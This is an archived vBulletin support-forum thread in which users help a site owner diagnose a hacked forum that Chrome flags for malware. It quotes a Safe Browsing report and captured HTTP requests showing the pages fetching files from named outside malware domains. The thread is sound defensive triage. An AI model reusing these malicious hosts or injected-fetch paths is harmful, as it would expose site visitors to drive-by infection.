Go Back   vb.org Archive > vBulletin 4 Discussion > vB4 General Discussions
Reload this Page Malware Issue
FAQ Community Calendar Today's Posts Search

Reply
 
Thread Tools Display Modes
  #1  
Old 12-20-2013, 01:01 AM
aspen1018 aspen1018 is offline
 
Join Date: May 2007
Posts: 73
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default Malware Issue
Chrome is giving a warning that my site is infected with malware. Anybody have any experience with cleaning this up?
Reply With Quote
  #2  
Old 12-20-2013, 01:02 AM
ForceHSS ForceHSS is offline
 
Join Date: Apr 2008
Posts: 6,357
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Link to site
Reply With Quote
Благодарность от:
Max Taxable
  #3  
Old 12-20-2013, 01:14 AM
aspen1018 aspen1018 is offline
 
Join Date: May 2007
Posts: 73
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
<a href="http://www.vspotlounge.com/forums/forum.php" target="_blank">www.vspotlounge.com/forums/forum.php</a>
Reply With Quote
  #4  
Old 12-20-2013, 01:22 AM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Here's what Google says about it:
Quote:
Safe Browsing
Diagnostic page for vspotlounge.com/forums

What is the current listing status for vspotlounge.com/forums?

Site is listed as suspicious - visiting this web site may harm your computer.

Part of this site was listed for suspicious activity 3 time(s) over the past 90 days.

What happened when Google visited this site?

Of the 107 pages we tested on the site over the past 90 days, 99 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2013-11-20, and the last time suspicious content was found on this site was on 2013-11-04.

Malicious software is hosted on 1 domain(s), including llamaralac1975.tk/.

This site was hosted on 1 network(s) including AS26496 (26496-GO-DADDY-COM-LLC).

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, vspotlounge.com/forums appeared to function as an intermediary for the infection of 6 site(s) including bullrunrally.com/, thepicsorbs.com/, uberbets.com/.

Has this site hosted malware?

No, this site has not hosted malicious software over the past 90 days.

How did this happen?

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.
Firefox alerted on it as well.

Here's what all your home page is loading:

http://www.webpagetest.org/result/131220_7B_2Z0/

Items 37 and 38 aren't familiar to me, are they to you? Item #4 is a XML application, looks suspicious but renders a 404.
Reply With Quote
  #5  
Old 12-20-2013, 01:38 AM
ForceHSS ForceHSS is offline
 
Join Date: Apr 2008
Posts: 6,357
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
<a href="http://sitecheck.sucuri.net/results/www.vspotlounge.com/forums/forum.php" target="_blank">http://sitecheck.sucuri.net/results/...rums/forum.php</a>
Reply With Quote
  #6  
Old 12-20-2013, 02:29 PM
aspen1018 aspen1018 is offline
 
Join Date: May 2007
Posts: 73
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by ForceHSS View Post

Thank you.

I check those specific pages and couldn't find the code in there

--------------- Added [DATE]1387553465[/DATE] at [TIME]1387553465[/TIME] ---------------

Quote:
Originally Posted by Max Taxable View Post
Items 37 and 38 aren't familiar to me, are they to you? Item #4 is a XML application, looks suspicious but renders a 404.

No they are not. Have no idea how to clean that up though
Reply With Quote
  #7  
Old 12-20-2013, 02:35 PM
Max Taxable's Avatar
Max Taxable Max Taxable is offline
 
Join Date: Feb 2011
Posts: 3,134
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
Quote:
Originally Posted by aspen1018 View Post
No they are not. Have no idea how to clean that up though
Those ARE the malware, as a closer look at the request reveals:
Quote:
GET /tmp/api.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.vspotlounge.com/forums/forum.php
Accept-Language: en-US
X-Download-Initiator: html="doc 0C40 win AAA0; html frame appendChild"
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) PTST/153
Accept-Encoding: gzip, deflate
Host: finansecity.pl
DNT: 1
Connection: Keep-Alive
And appear to be in /tmp/api.php

The second one is in a different location:
Quote:
GET /tmp/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.vspotlounge.com/forums/forum.php
Accept-Language: en-US
X-Download-Initiator: html="doc 0C40 win AAA0; html frame appendChild"
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0) PTST/153
Accept-Encoding: gzip, deflate
Host: finansecity.pl
DNT: 1
Connection: Keep-Alive
These files are not part of vBulletin. I think your board has been hacked and you should follow all the protocols for cleaning it.
Reply With Quote
  #8  
Old 12-20-2013, 02:59 PM
tbworld tbworld is offline
 
Join Date: Oct 2008
Posts: 2,126
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
This is known malware, I have seen it several times before and it is in my library of exploits. Use the standard vBulletin recommendations for eliminating an intrusion. It will work if you follow each step carefully.

Then please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked
http://www.vbulletin.com/forum/blogs...vbulletin-site

Also please see these recent security announcements:
http://www.vbulletin.com/forum/forum...-1-vbulletin-5
http://www.vbulletin.com/forum/forum...d-all-versions
Reply With Quote
Благодарность от:
Max Taxable
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 12:12 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.04233 seconds
  • Memory Usage 2,241KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (6)bbcode_quote
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (8)post_thanks_box
  • (2)post_thanks_box_bit
  • (8)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (2)post_thanks_postbit
  • (8)post_thanks_postbit_info
  • (8)postbit
  • (8)postbit_onlinestatus
  • (8)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • fetch_musername
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • post_thanks_function_fetch_thanks_bit_start
  • post_thanks_function_show_thanks_date_start
  • post_thanks_function_show_thanks_date_end
  • post_thanks_function_fetch_thanks_bit_end
  • post_thanks_function_fetch_post_thanks_template_start
  • post_thanks_function_fetch_post_thanks_template_end
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete